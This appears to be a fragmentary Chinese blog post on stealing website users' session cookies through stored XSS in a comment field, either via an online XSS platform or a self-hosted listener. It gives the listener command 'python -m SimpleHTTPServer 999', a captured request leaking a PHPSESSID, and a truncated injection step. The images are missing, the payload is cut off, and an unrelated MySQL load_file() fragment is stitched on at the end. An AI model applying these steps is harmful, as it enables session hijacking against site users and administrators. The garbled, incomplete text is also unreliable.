利用XSS在线平台获取用户cookie

//XSS弹窗:

利用XSS在线平台获取用户cookie_第1张图片

 利用XSS在线平台获取用户cookie_第2张图片

XSS漏洞:

 

//XSS弹窗:

//XSS在线平台:

利用XSS在线平台获取用户cookie_第3张图片

 利用XSS在线平台获取用户cookie_第4张图片

利用XSS端口监听用户cookie :

前台:发表评论点,评论能够插到后台

后台:每隔一分钟刷新一次

不用xss平台

本地监听 端口的形式
python监听

监听到的信息:
172.16.143,15 -- [31/Jan/2023 16:21:3] "GET /?PHPSESSID=05h6m0k67m8ad3jsn7rmiluum5 HTTP/1.1" 200

xss原理:还有xss的:

1:攻击机起服务监听
python -m SimpleHTTPServer 999

2:往攻击机插js语句:
">


//load_file

在MySQL中,load_file()函数读取一个文件并将其内容作为字符串返

你可能感兴趣的:(web,xss,前端,javascript)